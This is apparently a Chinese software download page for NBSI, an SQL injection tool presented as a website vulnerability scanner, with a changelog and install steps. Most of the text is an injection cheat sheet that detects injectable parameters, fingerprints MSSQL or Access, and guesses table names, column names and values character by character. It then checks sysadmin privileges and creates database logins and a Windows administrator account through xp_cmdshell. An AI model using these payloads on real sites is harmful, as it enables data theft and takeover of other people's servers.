6.48MB / 2025-05-16
nbsi是一款专业的网站安全漏洞检测的工具软件,软件支持显示状态可以设置提示那些状态码或者不提示那些状态码,十分方便快捷,界面简约,布局直观清晰,操作简单,极易上手,是一款不可多得的利器。
判断是否有注入
;and 1=1
;and 1=2
初步判断是否是mssql
;and user>0
判断数据库系统
;and (select count(*) from sysobjects)>0 mssql
;and (select count(*) from msysobjects)>0 access
注入参数是字符
'and [查询条件] and ''='
搜索时没过滤参数的
'and [查询条件] and '%25'='
猜数据库
;and (Select Count(*) from [数据库名])>0
猜字段
;and (Select Count(字段名) from 数据库名)>0
猜字段中记录长度
;and (select top 1 len(字段名) from 数据库名)>0
(1)猜字段的ascii值(access)
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0
(2)猜字段的ascii值(mssql)
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0
测试权限结构(mssql)
;and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'));--
;and 1=(SELECT IS_SRVROLEMEMBER('serveradmin'));--
;and 1=(SELECT IS_SRVROLEMEMBER('setupadmin'));--
;and 1=(SELECT IS_SRVROLEMEMBER('securityadmin'));--
;and 1=(SELECT IS_SRVROLEMEMBER('diskadmin'));--
;and 1=(SELECT IS_SRVROLEMEMBER('bulkadmin'));--
;and 1=(SELECT IS_MEMBER('db_owner'));--
添加mssql和系统的帐户
;exec master.dbo.sp_addlogin username;--
;exec master.dbo.sp_password null,
username,password;--
;exec master.dbo.sp_addsrvrolemember sysadmin
username;--
;exec master.dbo.xp_cmdshell 'net user username
password /workstations:* /times:all
/passwordchg:yes /passwordreq:yes /active:yes /add'
修复http发包API错误问题
优化字典,删了10万无用字典
显示状态可是设置提示那些状态码或者不提示那些状态码
下载安装包并打开
点击自定义选择安装位置安装
安装完成后即可打开使用
6.48MB / 2025-05-16
22.48MB / 2025-05-16
150.67MB / 2025-05-16
30.79MB / 2025-05-16
307KB / 2025-05-16
12.97MB / 2025-05-16
7.82MB
2025-05-16
6.48MB
2025-05-16
51.16MB
2025-05-16
13.47MB
2025-05-16
5.51MB
2025-05-16
0.75MB
2025-05-16
63.90MB / 2025-04-27
117.94MB / 2024-11-01
69.23MB / 2025-04-21
11.45MB / 2024-12-28
1.90MB / 2024-11-06
210.99MB / 2025-04-07
113.86MB / 2025-02-01
京ICP备14006952号-1 京B2-20201630 京网文(2019)3652-335号 沪公网安备 31011202006753号违法和不良信息举报/未成年人举报:legal@3dmgame.com
CopyRight©2003-2018 违法和不良信息举报(021-54473036) All Right Reserved
